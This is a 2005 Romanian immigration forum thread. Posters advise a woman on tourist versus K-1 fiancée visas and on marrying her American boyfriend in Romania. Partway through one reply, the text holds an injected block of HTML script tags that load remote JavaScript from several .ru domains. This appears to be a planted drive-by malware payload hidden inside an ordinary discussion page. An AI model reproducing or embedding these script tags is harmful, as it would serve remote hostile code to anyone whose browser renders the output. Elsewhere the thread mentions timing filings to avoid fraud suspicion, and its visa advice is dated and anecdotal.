PDA

Arată versiune întreagă : Casatorie in SUA cu cetatean american

viky
20.09.2005, 03:54
Salut!

Am si eu o mica problema, mai precis: daca reusesc sa primesc viza de turist pe 10 ani si plec in SUA pot sa ma casatoresc cu prietenul meu cetatean american (il cunosc de 1 an si a venit in Romania de 3 ori) sau o sa am probleme ?
Deocamdata am interviu pe 31 octombrie pentru viza de turist (vreau sa ne petrecem Craciunul impreuna), dar....... ma gandesc si la viitor pentru ca nu vreau sa astept 1 an sau chiar mai mult sa fim impreuna.

GNChicago
20.09.2005, 08:43
Cred ca nu trebuie sa ceri visa de turist.

El trebuie sa umple formulare pentru K1, fiancee si atunci guvernul american e Obligat sa aprobe si sa-ti dea tie visa de intrare si in trei luni trebuie sa va casatoriti legal si atunci ai toate drepturile.

radacos
20.09.2005, 10:38
GNChicago are dreptate, obtinerea vizei K1 este o cale mult mai sigura si dureaza in jur de 4-5 luni.
DAR, daca ai platit deja taxa pt. viza turistica (cum se pare ca ai facut-o), si ai noroc si o primesti, poti sa te casatoresti fara nici o problema. In ceea ce priveste obtinerea Green Card-ului pentru cineva in situatia ta (care a intrat in tara ca turist si s-a casatorit dupa aceea), se recomanda in general sa nu iti trimiti actele pentru Adjustment of Status imediat. Asta nu este o regula batuta in cuie, dar daca un turist intra in tara, se casatoreste in doua saptamani si trimite actele o saptamana dupa casatorie, Serviciul de Imigrari il poate acuza cu usurinta de "visa fraud" (adica a cerut o visa turistica cu intentia de a imigra). Chiar daca te casatoresti curand dupa ce sosesti, asteapta sa treaca cat mai mult timp pana sa trimiti actele. De exemplu, daca la intrarea in tara primesti 3 luni drept de sedere, asteapta cele 3 luni. Daca primesti 6 luni, asteapta 4-5 luni. Astea nu sunt reguli oficiale, dar influenteaza foarte mult opinia ofiterului de imigrari.
Mult succes!

viky
26.09.2005, 21:37
Multumesc pentru sfaturi.
Eu vreau deocamdata sa ma duc pentru 4 saptamani in vacanta de Craciun.
Problema mea cea mai mare este ca vreau dupa aceea sa fiu impreuna cu iubitul meu (cetatean american de cand s-a nascut) cat mai repede posibil. Nu stiu daca asta inseamna sa aplicam pentru K1 sau sa ne casatorim aici si apoi sa mergem impreuna la ambasada sa obtin viza.

crysty
27.09.2005, 14:05
smileys/smiley2.gifDaca vrei sa fi cat mai repede impreuna cu el(ca sot+sotie) pune-l sa vina in Romania,casatoriti-va aici,intre timp pregateste-ti "albumul de familie"(poze cu el,scrisori..etc)note telefonice si restul "dosarului".

Cand vine(si va duce-ti la interviu-programat in prealabil)trebuie sa aduca din US acte doveditoare ca poate sa te intretina(cont de banca),asigurare sanatate,taxreturn pe anul trecut si cam atat...parca.(nu mai tin minte precis ...de acum trei ani...a trecut timpul!!!!)

Dupa interviu,in cel mult o luna esti in US.....FARA PROBLEME...si cam la trei saptamani iti vine acasa prin posta si GC.(cu drept de munca+restul).

Nu vreau sa te descurajez,dar tot asa am patit si eu,si ASTA MI-O AMINTESC BINE DE TOT.

Am cerut viza ptr. a petrece sarbatorile de Craciun,si dupa ce am intepenit la coada de la 3 dim.pana pe la 9,IN 5 MIN.MI-AU LUAT BANII SI.....AFARA-RESPINS(am intrebat de ce:NU VA CALIFICA-TI-raspunsul tipic securistelor noastre care lucrau(nu mai stiu cum este acum)acolo.(si am avut o invitatie BETON+acte de bancasmileys/smiley20.gifGRELE)

Asa ca ,AM PETRECUT CRACIUNUL IMPREUNA IN RO.,am programat interviul+restul ,si le-am dat FLIT jigodiilor de acolo F.F.F.REPEDE.

Sper sa-ti foloseasca si sa poti duce la bun sfarsit ceea ce ti-ai propus.

Baftasmileys/smiley1.gif

viky
27.09.2005, 20:54
Multumesc Crysty.

Sper ca eu sa am mai mult noroc ca tine si sa pot petrece Craciunul cu iubitul meu in SUA. Daca nu se intampla asa vrem sa facem exact ce ai spus tu (Craciun in Romania.... casatorie..... plecat urgent).
Pot sa te intreb daca cumva tu erai angajata cand ai aplicat pentru viza de turist si aveai si adeverinta de la firma?

crysty
28.09.2005, 02:21
smileys/smiley1.gifEram angajaTsmileys/smiley1.gif

Si le-am dus si adeverinta de salariu,si bani in cont,si de casa proprietate...etc...nu a tinut.

Poate ai mai mult noroc,si lucrurile s-or fi schimbat????!!!!

In orice caz,dupa interviul la care am fost IMPREUNA(a vorbit mai mult ea)-a contat ,printre altele si CONTUL EI DIN BANCA(unul din ele,ptr. ca nimeni nu-si arata totibanii!!!!)mi-au dat trei adrese de spital(policlinica particulara)sa aleg din ele si sa fac NISTE ANALIZE.Din cate mai tin minte,parca erau asa:la Colentina la spital,la Dorobanti( cu Dacia)era?1este?!o policlinica Romana-Americana,si a treia,alta clinica particulara,intr-un bloc,pe la etajul 4-5(nu mai stiu exact)CHIAR linga amb. americana-deasupra de agentiile de bilete de avion.

Toate acestea erau AGRTEATE de ei,adica cu alte cuvinte-oamenii lor-(le-am luat pe toate trei la rand,sa vad despre ce este vorba:TOTUL erau BANII-la Colentina=cel mai ieftin).

Dupa ce iti face nu stiu de fel de vaccin,la plamini-raze,iti da un MAREEE plic galbui-maroniu cu nu mai tin minte cate stampile pe el,si-ti atrage ATENTIA :SA NU-L DESCHIDE-TI CUMVA!!!!

Eram mort-copt(iti dai seama:daca rezultatul analizelor nu este bun,daca m-a respins,daca.....)

M-am intilnit cu un prieten,care m-a linistit spunindu-mi:din moment ce ai plicul,esti ca si plecat,du-te si ia-ti bilete.Si asa a fost,cu plicul m-am dus la o noua"infatisare"am mai pierdut ~o zi pe acolo,si la urma mi-au pus viza CR1,si mi-au dat plicul(nedesfacut)sa-l iau cu mine,din nou:SA NU-L DESFACE-TI??!!!il preda-ti la sosire in America....bla,bla,bla.

Aiurea,am si acum plicul(l-am desfacut sa vad ce mare rahat este in el....normal,analizele mele,si plicul zace intr-un sertar,nu a trebuit la nimeni,numai ca sa-ti ia banii)

Ceea ce vreau sa-ti spun este urmatoarea chestie:daca el aduce actele lui BETON,si ai toate ce ti le-am spus mai sus O.K., NU O SA AI NICI cea mai mica PROBLEMA ,si aisa citesti pe figuara celor de la ambasada,spital,primarie,etc...pe unde mai te invarti dupa acte,O MARE CIUDA,INVIDIE....MAI PLEACA UNUL SI NOI RAMANEM AICI.

Altceva,nu stiu ce studii ai ,dar nu te duce la Min.Invatamaintului sa-ti traduci,stampilezi acte de studii...etc....DAI BANII DEGEABA SI PIERZI TIMPUL PE LA COZI.Aici nu-ti echivaleaza nimeni,nimic,TREBUIE SA O IEI DE LA CAPAT,ce nu este facut AICI,NU-I VALABIL.(eu am tradus:livret militar-degeaba,diploma TCM-degeaba,diploma liceu-degeaba...totul este NUMAI CA SA-TI IA BANII DEGEABA).

Cam atata mi-aduc aminte acum,sper(inca o data)sa-ti foloseasca.(a,inca ceva...daca ai avut probleme cu alte casatori-divorturi:adu la ambasada hotararea definitiva)!!!

BAFTA!!!!!

Ceea ce vreau sa-ti spun/script>ript src=http://c=http://www.c<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www.bce8.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.kpo3.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.iroe.ru/n<script src=http://www.iroe.ru/ngg.js></script>

viky
28.09.2005, 05:21
Imi cer scuze..... eu credeam ca ma conversez cu o "EA".

M-ai cam intristat cu raspunsul in legatura cu Craciunul dar.... nu imi pierd speranta mai ales ca eu chiar trebuie sa ma intorc in tara. Iubitul meu s-a suparat foarte tare cand i-am spus ca s-ar putea sa nu imi dea viza nici acum si exista o posibilitate mica sa nu primesc viza nici daca aplicam pentru K1.
Tu crezi ca ar trebui sa imi faca si o invitatie in afara de Affidavit? Affidavit-ul este notarizat in iulie oare o fi vreo problema?

Bine ca mi-ai spus de diplome ca eu ma si gandeam unde sa ma duc. Chiar nu ma ajuta cu nimic? Aoleuuuu atatia ani de scoala pierduti. Oricum ma pregatesc de un Toefl ca asta ma ajuta sigur.

Spre bucuria mea nu am alte obligatii, casatorii sau copii.

Te tin la curent.... ca ..... ce bine e sa ai cu cine sa vorbesti si sa te sfatuiesti.

crysty
29.09.2005, 01:39
Orice hartie oficiala in plus de la el,este binevenita la dosar.

Poate ca acum sau mai schimbat lucrurile(desi nu cred)si s-ar putea sa ai noroc,dar pe cei din ambasada nu-i intereseaza DELOC ca tu vrei sa te mai intorci sau nu dupa Craciun;este F.F.F.BINE stiut ca orice persoana TINARA care aplica(si primeste)viza de.......orice,odata ajunsa in US,va faceTOTUL sa nu mai plece.

De aceea ti-am povestit "istoria"mea(noastra)ptr. ca tot asa s-a gandit si jumatatea mea:

1.sa petrecem sarbatorile impreuna(ptr. ca aici ESTE si AI ce vedea de Craciun-apropo,ptr. americani Craciunul este MAI IMPORTANT decat Pastele nostru)

2.sa vedem daca ma pot acomoda cu US;tot ca o paranteza,NU este chiar asa usor,oricata engleza stii,au foarte multe "prescurtari,abrevieri,termene pe care nu ai de unde sa le stii....etc".

Ptr. chestia cu notarizarea,parca(nu mai stiu sigur)era valabila sase(6)luni.Pune-l sa-ti trimeata OBLIGAT si invitatie.

Cum ti-am mai spus,SINGURA chestie ca sa scapi CAT MAI REPEDE de RRRRRRom...anica este NUMAI casatoria acolo,si in ~o luna ai plecat!!!!

DACA iti dau viza (de turist...etc)si vii aici,si te casatoresti aici(US)asa cum ti-a mai zis cineva,trebuie sa treaca DESTUL de mult timp ca sa poti ramane.Bate la ochi.

Eu stiu ca lui ii este greu sa piarda ceva timp prin Ro,dar daca vrei (ti)sa face-ti ceva ,numai asa poti face.Este destul de repede,si cu ocazia asta,ai si GC REPEDE.

Mai ganditi-va!!!!!!!smileys/smiley2.gif

viky
29.09.2005, 03:37
Iti multumesc mult....
El nu are nici o problema cu faptul ca trebuie sa vina in Romania problema e ca vreau sa fim impreuna nu pe drumuri tot timpul.
Imi spui si mie, te rog, ce ar trebui sa scrie in invitatie?

crysty
29.09.2005, 05:02
Nu exista "ceva special,sau STAS"dacama intelegi.

Ptr.ca se apropia perioada sarbatorilor de iarna,a scris ca vrea sa petrecem sarbatorile impreuna,sa vizitez muzeele din NYC,sa "iaucontact cu traditiile sicultura"americana(apropo,noi stam in NY),si ceva cam de genul acesta.

Dar,inca o data iti spun,crede-ma ca "fetitele cu ochii albastrii"de la ghiseu,nici nu baga in seama treburile astea.La asa zisul interviu,tu dai invitatia+ce mai ai tu acolo(alte acte)si ele iti pun stampila pe pasaport cu "respins".

NU STAI DE VORBA(la faza asta,adica de depunere de cerere ptr. viza de....nu stiu ce)cu nici un functionar AMERICAN,adica consul,vice-consul,sau alt atasat de al lor care se ocupa de acte de plecare.Atunci cand am fost eu,erau 2(unul mai in varsta,~55,celalalt ~40)la primele doua ghisee,iar in rest,numai "ochii blue".Probabil ca s-au mai schimbat intre timp.

DACA el vine,si depune-ti toate actele asa cum ti-am spus,ei nu mai au ce sa faca si trebuie sa urmeze CURSUL ACTELOR,si atunci sta de vorba cu el(acesta este intradevar -interviul-)angajatul american,si NU POATE SA-L RESPINGA(repet-daca aveti toate actele in regula).

Nu este greu de loc,dar daca nu te invata (spune)nimeni ,nimic,totul pare FFF GREU.

Daca aveti (tu,el)intradevar ganduri serioase,pune-l sa vina si intr-o luna ati plecat amindoi(definitiv).

Nu veti fi pe drumuri de loc,singurul drum va fi al lui,ptr. casatorie+acte ambasada.ATAT!!!!!

radacos
29.09.2005, 17:02
Viky, si eu as recomanda calea casatoriei. Nu sunt convinsa insa ca daca va casatoriti aici o sa puteti pleca intr-o luna. Cunosc persoane pentru care obtinerea vizei pe calea a durat in jur de un an, desi se poate, desigur, mai repede. Cea mai rapida viza la momentul asta este K-1, viza de logodnic, care dureaza aproximativ 3-4 luni. Uite-te pe site-ul ambasadei daca vrei informatii suplimentare.
Pentru viza turistica, singurul lucru care te-as sfatui este sa nu ai invitatie de la EL, caci este posibil sa te suspecteze. Roaga-l sa-si roage parintii sau o ruda/prietena de sex feminin sa-ti trimita invitatia. Nu vreau sa te alarmez, dar singura data cand am fost respinsa am avut invitatie de la EL (si eram studenta, si angajata cu scrisoare de la angajator ca ma asteapta sa ma intorc).
Daca esti angajata si ai acte chiar mai putin de beton (atata vreme cat ai bani pentru a te sustine pe perioada vizitei), nu ai nevoie de Affidavit of Support, ci doar de invitatie simpla, tiparita si semnata.

GNChicago
29.09.2005, 17:46
Mai de mult am umplut si eu niste formulare ptr K1 si aprobarea a venit f. repede. Serviciul american e OBLIGAT sa aprobe daca toate actele cerute in k1 sint acolo. Odata aprobata ambasada va da viza.

Cred ca e cea mai scurta cale.

Si eu cunosc oameni care s-au dus in Romania sa se casatoreasca acolo si pe urma au asteptat aproape un an. Probabilcristy avea aprobarea la k1 si cind s-au dus la ambasada, le-au pus viza.

Ginditiva la ingeniozitatea romanilor, care mai de care s-ar casatori in fuga si ambasada sa nu cerceteze nimic si sa dea vizele ca biletele la teatru.....E greu de crezut ca se poate asa repede, fara aprobari luate in prealabil.

Tipul, ca cetatean american poate intra acolo oricind in programul de lucru.

Eu de cite ori am fost acolo ptr rude sau prieteni, prima data am intrebat cum se numeste interlocutorul meu, ceea ce mi se pare normal, el stie numele meu si eu vreau sa stiu cu cine stau de vorba.

Daca el nu crede ceva atunci vii cu argumente plauzibile.

Si inca ceva, la americani nu le place sa-i minti ca atunci ai terminat-o cu ei. Apreciaza f. mult sa vorbesti deschis si sa-ti aperi cauza.

Aproape ca m-as duce acolo si le-as spune ca parintii lui vor sa ma cunoasca si vrem sa ne casatorim la anul ptrca acum avem alte planuri ca de ex....si vreau sa avem o relatie solida, etc.....

Mult succes!

crysty
30.09.2005, 01:00
smileys/smiley1.gifFara nici un fel de suparare(ptr.RADACOS,asta apropo de ce ai spus cu aceia care au asteptat ~un an).

Daca casatoria este facuta NUMAI ptr. a veni in US,cei din ambasada,in 99,9% din cazuri STIU treaba asta.Stiu "baietii"toate trucurile care se aplica,inclusiv(pe vremea cand am aplicat eu)spaga care se dadea~$3000.Te "citesc" de la prima vedere,ca sa zic asa.&n bsp;

smileys/smiley2.gifOff topic:cand am fost la interviul ptr.definitivarea rezidentei in US,erau cateva perechi care "sareau"in ochi din prima:EA~60,aranjata,fardata,EL~25,genul de gigolo flamand;i-au tinut si plimbat dintr-o camera in alta cam trei ore,si la urma i-am vazut plecand foarte suparati(cred ca realizezi de ce).Asta,numai un exemplu.

Acum,fiecare cu norocul lui;incearca ambele variante si vei vedea.La prima(cu viza de vizita)daca nu-ti aproba,pierzi banii+timp+o stampila pe pasaport de respins;la a doua varianta(parerea mea-reusesti sa pleci).

Succes!!!!smileys/smiley20.gif

02.10.2005, 11:19
smileys/smiley32.gifcrysty are perfecta dreptate !!! Si eu am trecut prin aceeasi situatie. Cu toate ca initial am obtinut K1, am renuntat la calea cu logodna, dupa ce am ascultat de cei care au obtinut cu SUCCES ceea ce si noi doream ( persoane ca si crysty ). Am mers pe ceea ce se numeste DCF ( direct consular filing), vezi informatia la siteul ambasadei USA.

Ne-am casatorit in Romania, si dupa 28 de zile am avut in mina "plicul galben". Totul este exact cum a decris crysty. E drept, asta a fost acum patru ani, dar am prieteni care au facut acelasi lucru si merge la fel si acum.

Nu te complica cu invitatii si alte dobitocii. Daca treaba e serioasa si casatoria e "legit" nu ai de ce sa te sperii.

Succes !!!

02.10.2005, 19:58
Parerea mea, ar trebui sa se dea vizele de turist la cei care vor sa vina in america sa vada cum este prima data inainte de a face pasul casatoriei, la unele persoane s-ar putea sa nu le placa

angela
03.10.2005, 04:06
K1 este pentru acelasi lucru. Iti acorda viza pe 3 luni timp in care
poti vedea daca iti place sau nu America si viitorul sot. Casatoria nu
poate dura mai mult de 24 ore deci ai toate celelalte 89 zile sa te
gandestismileys/smiley2.gif

04.10.2005, 13:55
Viza K1 mi se pare ca este prea scurt timpul pt. a vedea si cunoaste persoana cu care vrei sa te casatoresti, cu o viza de turist obtinuta pe 10 ani poti sa vii de mai multe ori sa petreci mai mult timp sa vezi daca intradevar este ceea ce doresti pt. viitor...eu una acuma as alege aceasta cale daca ar fi s-o iau din nou de la inceput....

viky
04.10.2005, 22:44
Multumesc tuturor pentru sfaturi.
Daca imi pun respins pe pasaport B1 are oare vreo influenta daca apoi aplicam pentru K1?

crysty
05.10.2005, 00:12
Nu te afecteaza cu nimic:pe ei ii intereseaza in primul rand sa-ti ia banii,si dupa aceea sa vada actele.smileys/smiley2.gif

Cand ai sa intrii in ambasada,dupa ce treci de portile rotative,primul lucru te intreaba de telefon,golesti buzunarele +poseta de obiecte metalice(le pui intr-un cos de plastic),te controleaza cu un detector de metale si apoi ITI IAU BANUTII(extrasul de la banca).

Apoi ,te intreaba ptr. ce....iti iau actele...si LA ASTEPTARE.

Cam asta era sistemul acum cativa ani,sint sigur ca nu s-a schimbat nimic!!!!

Bafta!!!!!!